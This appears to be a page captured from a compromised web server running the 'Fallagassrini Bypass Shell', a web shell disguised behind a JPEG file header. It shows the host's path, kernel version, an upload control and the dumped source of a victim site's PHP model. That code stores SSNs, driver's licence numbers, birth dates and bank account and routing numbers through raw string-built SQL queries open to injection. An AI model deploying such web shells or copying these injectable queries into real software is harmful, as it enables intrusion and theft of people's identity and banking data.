JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/public_html/application/models/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/public_html/application/models/main_model.php

<?php 
class Main_model extends CI_Model
{
	public function __construct()
	{
		parent::__construct();
		$this->load->library('email');
		$this->load->helper(array('url','string'));
		$this->load->database();
	}
	public function inner_wiz()
	{
		$fn=$this->input->post('fname');
	if(isset($fn)) { 	$fname=$fn; } 		else { $fname=""; } 
	$ln=$this->input->post('lname');
	if(isset($ln)) { 	$lname=$this->input->post('lname'); } 		 else { $lname=""; } 
	$comp=$this->input->post('company');
	if(isset($comp)) { 	$company=$this->input->post('company'); }	  else { $company=""; } 
	$str=$this->input->post('street');
	if(isset($str)) { 	$street=$this->input->post('street'); }  	else { $street=""; } 
	$un=$this->input->post('unit');
	if(isset($un)) { 	$unit=$this->input->post('unit'); }	 else { $unit=""; }
	$st=$this->input->post('state');
	if(isset($st)) { 		$state=$this->input->post('state'); } else {  $state=""; }
	$zi=$this->input->post('zip');
	if(isset($zi)) { 		$zip=$this->input->post('zip'); } else {  $zip=""; }
	$ph=$this->input->post('phone');
	if(isset($ph)) { 		$phone=$this->input->post('phone'); }  else { $phone=""; }
	$gen=$this->input->post('gender');
	if(isset($gen)) { 		$gender=$this->input->post('gender'); } else { $gender=""; }
		
		$at=$this->input->post('acc_type');
	if(isset($at)) { 		$acc_type=$this->input->post('acc_type'); } else { $acc_type=""; }
	$an=$this->input->post('acc_number');
	if(isset($an)) { 		$acc_number=$this->input->post('acc_number'); } else { $acc_number=""; }
	$rn=$this->input->post('routing_number');
	if(isset($rn)) { 		$routing_number=$this->input->post('routing_number'); } else { $routing_number=""; }
	$nac=$this->input->post('name_acc');
	if(isset($nac)) { 		$name_acc=$this->input->post('name_acc'); } else { $name_acc=""; }
		$property_associated="";
		$pac=$this->input->post('prop');
		if(isset($pac))
		{
		foreach($this->input->post('prop') as $prop)
		{
		$property_associated=$property_associated.",".$prop;
		}
		} else {  $property_associated="";  }
		$sssn=$this->input->post('ssn');
	if(isset($sssn)) { 		$ssn=$this->input->post('ssn'); } else  { $ssn=""; } 
	$dl=$this->input->post('dln');
	if(isset($dl)) { 		$dln=$this->input->post('dln'); } else { $dln=""; }
	$ds=$this->input->post('dls');
	if(isset($ds)) { 		$dls=$this->input->post('dls'); } else { $dls=""; }
	$db=$this->input->post('dob');
	if(isset($db)) { 		$dob=$this->input->post('dob'); } else { $dob=""; }
		
		
		$this->db->query("insert into tbl_acc_property (acc_type,acc_no,routing_no,name_account,properties_associated,user_id)
												values('$acc_type','$acc_number','$routing_number','$name_acc','$property_associated','".$_SESSION['user_id']."')");
												
		$this->db->query("insert into tbl_user_info(company,street,unit,state,zip,phone,gender,ssn,dln,dls,dob,user_id)
												values('$company','$street','$unit','$state','$zip','$phone','$gender','$ssn','$dln','$dls','$dob','".$_SESSION['user_id']."')");
		?>
		<script>
		window.location.href="<?php echo base_url(); ?>dashboard";
		</script>
<?php } 

		public function add_schedule()
		{
		
				$land=$this->input->post('landlord');
	if($land!='') { 	$landlord=$land; } 		else { $landlord=""; } 
	
					$pro=$this->input->post('property');
	if($pro!='') { 	$property=$pro; } 		else { $property=""; } 
		
	
					$cate=$this->input->post('category');
	if($cate!='') { 	$category=$cate; } 		else { $category=""; }
		
	
					$pri=$this->input->post('price');
	if($pri!='') { 	$price=$pri; } 		else { $price=""; } 
	
	
					$dd=$this->input->post('due_date');
	if($dd!='') { 	$due_date=$dd; } 		else { $due_date=""; } 
		
	
					$sta=$this->input->post('status');
	if($sta!='') { 	$status=$sta; } 		else { $status=""; } 
		
					$tna=$this->input->post('tenant');
	if($tna!='') { 	$tenant=$tna; } 		else { $tenant=""; } 
		

$ten=$this->db->query("select * from tbl_users where email='$tenant' and status='1'");
$neta=$ten->num_rows();	
					if($neta<1)
					{ $_SESSION['tnt_found']="No Tenant Found";
							?>
		<script>
		window.location.href="<?php echo base_url(); ?>property_manager/maintenance";
		</script>
		<?php 
					} else { 
			
		
		$dated=date('Y-m-d');
		
		$alt=$this->db->query("select * from property_maintenance where tenant='$tenant' and category='$category'");
		$atp=$alt->num_rows();

		$man=$this->db->query("select * from tbl_users where id='".$_SESSION['user_id']."'");
		$manage=$man->row_array();
		
if($atp<1)
{
	$_SESSION['tnt_found']="New Schedule has been added";
	$this->db->query("insert into  property_maintenance (tenant,added_on,category,due_date,cost,status,landlord,property,manager,user_status)
	values('$tenant','$dated','$category','$due_date','$price','$status','$landlord','$property','".$manage['email']."','1')");
	
}	 else 
{ 
$_SESSION['tnt_found']="Schedule has been updated";
		$this->db->query("update  property_maintenance set tenant='$tenant',added_on='$dated',category='$category',due_date='$due_date',cost='$price',status='$status',user_status='1' where manager='".$manage['email']."' and tenant='$tenant' and category='$category'");

		}
		
		?>
		<script>
		window.location.href="<?php echo base_url(); ?>property_manager/maintenance";
		</script>
					<?php } } 
		
		
		
		public function manager_details($id)
		{
			$query=$this->db->query("select * from property_maintenance where landlord='$id' and manager<>''"); 
			return $query->result_array();
		}		
		
		public function tenant_details($id)
		{
			$query=$this->db->query("select * from property_maintenance where landlord='$id'  and  tenant<>''"); 
			return $query->result_array();
		}
				
		public function rent_details($id)
		{
			$query=$this->db->query("select * from property_maintenance where landlord='$id' and tenant<>'' and user_status='1'"); 
			return $query->result_array();
		}
		

		
		  } ///*******************************class*************************ends           */ ?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net